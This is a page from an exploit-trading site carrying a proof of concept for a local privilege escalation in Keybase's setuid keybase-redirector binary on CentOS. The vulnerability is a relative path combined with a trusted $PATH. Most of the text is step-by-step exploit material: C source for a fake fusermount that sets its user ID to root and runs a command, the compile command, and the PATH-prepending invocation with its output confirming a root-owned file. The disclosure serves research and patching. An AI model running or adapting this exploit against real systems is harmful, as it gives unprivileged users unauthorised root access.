0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Keybase keybase-redirector - ($PATH) Local Privilege Escalation Exploit
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
keybase-redirector is a setuid root binary. keybase-redirector calls the fusermount binary using a relative path and the application trusts the value of $PATH. This allows a local, unprivileged user to trick the application to executing a custom fusermount binary as root. ## Environment CentOS Linux release 7.4.1708 (Core) 3.10.0-693.17.1.el7.x86_64 RPM info ``` Name : keybase Version : 2.8.0.20181017144746.3efc4cbf3c Release : 1 Architecture: x86_64 Install Date: Mon 22 Oct 2018 05:30:36 PM EDT Group : Unspecified Size : 273302678 License : BSD Signature : RSA/SHA256, Wed 17 Oct 2018 10:55:21 AM EDT, Key ID 47484e50656d16c7 Source RPM : keybase-2.8.0.20181017144746.3efc4cbf3c-1.src.rpm Build Date : Wed 17 Oct 2018 10:54:47 AM EDT Build Host : 6ae61e160e87 Relocations : (not relocatable) Summary : Keybase command line client Description : Keybase command line client ``` An unprivileged user named user1 is used for this PoC. ## Steps to reproduce 1) Display privileges of user 1 - execute the id command ``` [user1@localhost woot]$ id uid=1000(user1) gid=1000(user1) groups=1000(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 ``` 2) Create a custom fusermount application. This PoC will create /w00t as root. Arbitrary commands can be executed. ``` cat >fusermount.c<<EOF #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <unistd.h> int main(int argc, char **argv) { setreuid(0,0); system("/usr/bin/touch /w00t"); return(0); } EOF `` 3) Compile fusermount.c ``` gcc -Wall fusermount.c -o fusermount ``` 4) Verify that /w00t does not exist. ``` [user1@localhost woot]$ ls -ld /w00t ls: cannot access /w00t: No such file or directory ``` 5) Prepend the PATH environment variable with a dot(for current working directory) and execute keybase-redirector which in turn will execute the malicious fusermount binary as root. ``` env PATH=.:$PATH /usr/bin/keybase-redirector /keybase ``` 6) Enter the control-c sequence to kill the application. ``` [user1@localhost woot]$ env PATH=.:$PATH /usr/bin/keybase-redirector /keybase ^C ``` 7) Verify that /w00t exists ``` [user1@localhost woot]$ ls -ld /w00t -rw-rw-r--. 1 root user1 0 Oct 22 16:34 /w00t [user1@localhost woot]$ ``` ## Impact Unauthorized root access is possible which impacts the confidentially, integrity, and availability of the system. # 0day.today [2024-12-25] #